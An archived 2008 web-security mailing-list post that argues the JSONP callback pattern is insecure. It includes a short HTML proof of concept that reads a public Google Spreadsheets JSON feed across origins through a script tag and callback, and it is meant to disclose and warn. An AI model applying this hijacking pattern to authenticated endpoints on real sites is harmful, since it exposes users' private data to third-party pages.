[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[WEB SECURITY] JSON Hijacking - Cross-browser issue
- From: "application.secure application.secure" <application.secure@xxxxxxxxx>
- Subject: [WEB SECURITY] JSON Hijacking - Cross-browser issue
- Date: Thu, 14 Aug 2008 21:48:12 +0200
------=_Part_64338_16815704.1218743292978
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Hello community,
I'm currently investigating AJAX security (based on the excellent book Billy
Hoffman & Bryan Sullivan).
The interesting chapter on JSON Hijacking is speaking about JSON issue based
on Array and Object function Clobbering which works only on Mozilla.
Maybe the next topic has been discussed before in the security community...
the issue works on IE and Mozilla.
For example, spreadsheets.google.com proposes a JSON service based on a
call-back pattern.
In this case, the JSON end-point is public... so there is no problem!
My conclusion is that call-back pattern is insecure... Avoid the use of
call-back pattern.
----------------------------------------------------
<html>
<script>
function listEntries(json){
ret="";
for (var i = 0; i < json.feed.entry.length; i++) {
var entry = json.feed.entry[i];
ret+=entry.title.$t;
ret+=entry.content.$t;
}
alert(ret);
}
</script>
<script id="external_script" src="
http://spreadsheets.google.com/feeds/list/o13394135408524254648.240766968415752635/od6/public/values?alt=json-in-script&callback=listEntries
"></script>
</html>
----------------------------------------------------
------=_Part_64338_16815704.1218743292978
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
<div dir="ltr">Hello community,<br>I'm currently investigating AJAX security (based on the excellent book Billy Hoffman & Bryan Sullivan).<br>The interesting chapter on JSON Hijacking is speaking about JSON issue based on Array and Object function Clobbering which works only on Mozilla.<br>
<br>Maybe the next topic has been discussed before in the security community... the issue works on IE and Mozilla.<br>For example, <a href="http://spreadsheets.google.com";>spreadsheets.google.com</a> proposes a JSON service based on a call-back pattern.<br>
In this case, the JSON end-point is public... so there is no problem!<br><br>My conclusion is that call-back pattern is insecure... Avoid the use of call-back pattern.<br><br>----------------------------------------------------<br>
<font size="1"><html><br><script><br>function listEntries(json){<br> ret="";<br> for (var i = 0; i < json.feed.entry.length; i++) {<br> <br> var entry = json.feed.entry[i]; <br>
ret+=entry.title.$t; <br> ret+=entry.content.$t;<br> }<br> alert(ret);<br>}<br></script><br><script id="external_script" src="<a href="http://spreadsheets.google.com/feeds/list/o13394135408524254648.240766968415752635/od6/public/values?alt=json-in-script&callback=listEntries";>http://spreadsheets.google.com/feeds/list/o13394135408524254648.240766968415752635/od6/public/values?alt=json-in-script&callback=listEntries</a>"></script><br>
</html></font><br>----------------------------------------------------<br> </div>
------=_Part_64338_16815704.1218743292978--
Brought to you by http://www.webappsec.org
Search this site
|